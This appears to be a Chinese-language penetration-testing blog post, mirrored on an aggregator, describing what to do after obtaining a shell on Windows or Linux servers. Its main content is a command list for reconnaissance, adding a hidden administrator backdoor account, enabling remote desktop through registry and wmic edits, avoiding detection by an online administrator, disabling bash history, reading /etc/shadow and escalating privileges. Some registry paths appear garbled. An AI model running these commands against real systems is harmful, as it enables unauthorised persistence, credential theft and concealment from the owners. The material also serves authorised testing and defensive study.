zoukankan      html  css  js  c++  java
  • 获取Shell后的操作

    对于Windows系统主机和Linux系统主机,获取Shell后的操作都不同。

    Windows

    当我们通过对Web服务器进行渗透,拿到了该Web服务器的shell后,可以执行系统命令后,我们该如何操作呢?

    第一步,先 whoami  查看用户身份,如果是系统用户那就再好不过了,如果是普通用户的话,就得想办法提权了。提权之后,利用mimikatz获取用户密码。如果是域环境的话,还可以获取登录过该主机的域用户密码。传送门——> 使用 mimikatz 破解windows登录密码

    或者我们可以反弹一个MSF类型的shell到kali中,传送门——> 反弹MSF类型的Shell    ,  MSF之后渗透阶段

    以下命令是在Windows主机渗透测试过程中可以用到的

    #信息探测
    ipconfig       #查看ip等信息
    systeminfo     #查看系统信息
    netstat -ano   #查看端口开放信息
    tasklist /svc  #查看进程信息
    net user       #查看主机用户
    net localgroup #查看主机组
    net share      #查看开放的共享
    net view       #查看内网主机信息
    
    
    #添加用户后门
    net user hack 123 /add                   #添加用户并设置密码
    net localgroup administrators hack /add  #将用户加入管理组
    net user guest /active:yes               #激活guest用户
    net user guest mstlab                    #更改guest用户的密码

    更多Windows CMD窗口的命令,传送门——> Windows常见的cmd命令

    如果对方主机没开3389端口怎么办?以下命令可以开启远程桌面服务,前提是管理员权限。

    1.通用开3389(优化后):
      wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
    2.For Win2003:
      REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
    3.For Win2008:
      REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
    4.For Every:
      win08,三条命令即可,win2012通用;win7前两条即可。权限需要administrator。
      wmic /namespace:
    ootcimv2	erminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1
      wmic /namespace:
    ootcimv2	erminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1
      reg add "HKLMSYSTEMCurrentControlSetControlTerminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
    

    创建了后门用户,开启了远程桌面,我们就可以远程连接了。但是这里要注意,远程连接前判断该用户是否在线,万一对方管理员在线,你把人家给挤下去了,这样一下子就暴露了。开启远程桌面前慎重,慎重再慎重。

    远程桌面登录后,我们查看桌面上有哪些软件,我们要找的目标有以下。

    • FTP相关的软件
    • 数据库相关的软件
    • 打开浏览器,查看历史记录,查看某些网站是否保存有用户密码。利用工具查看浏览器保存的密码

    总结:获得了权限之后,尽一切可能搜集该主机的信息,该主机上各种服务的用户名和密码。为接下来的内网渗透弱口令爆破做准备。

    Linux

    在获得了Linux主机的权限后。第一步,我们要做的就是让我们接下来操作的所有命令不在主机上留下任何痕迹。我们可以执行下面的命令,这样我们接下来执行的所有命令都不会在 .bash_history中看到了。这条命令只对当前终端有效!

    export HISTFILE=/dev/null export HISTSIZE=0

    先查看当前用户身份,是否是root权限身份,如果不是的话,查看系统版本,是否可以利用已知漏洞提权的,比如 CVE-2016-5195 。 Linux下用SUID提权

    然后要做的自然就是维持权限了,传送门——>  Linux获取权限

    whoami       #查看当前用户身份
    uname -a     #查看系统信息
    history      #查看命令历史,有可能可以查看到管理员的一些重要命令,包括密码等
    last         #查看登录历史
    cat /etc/passwd  #查看用户
    cat /etc/shadow  #查看密码

    未完待更新。。

    相关文章:Linux 主机超全渗透测试命令汇总

  • 相关阅读:
    【转】130 个相见恨晚的超实用网站,一次性分享出来
    基于maven testng extentreport git jenkins 持续自动化测试
    TestNG与ExtentReport集成
    Jenkins集成jSonarQube
    SonarQube & Sonar Scanner
    Jenkins集成jacoco收集单元测试覆盖率
    Jenkins集成jacoco收集集成测试覆盖率
    Jacoco收集单元测试、集成测试和系统功能测试覆盖率
    SoanrQube7.4安装(Window)
    SoanrQube使用maven进行代码分析
  • 原文地址:https://www.cnblogs.com/csnd/p/11807663.html
Copyright © 2011-2022 走看看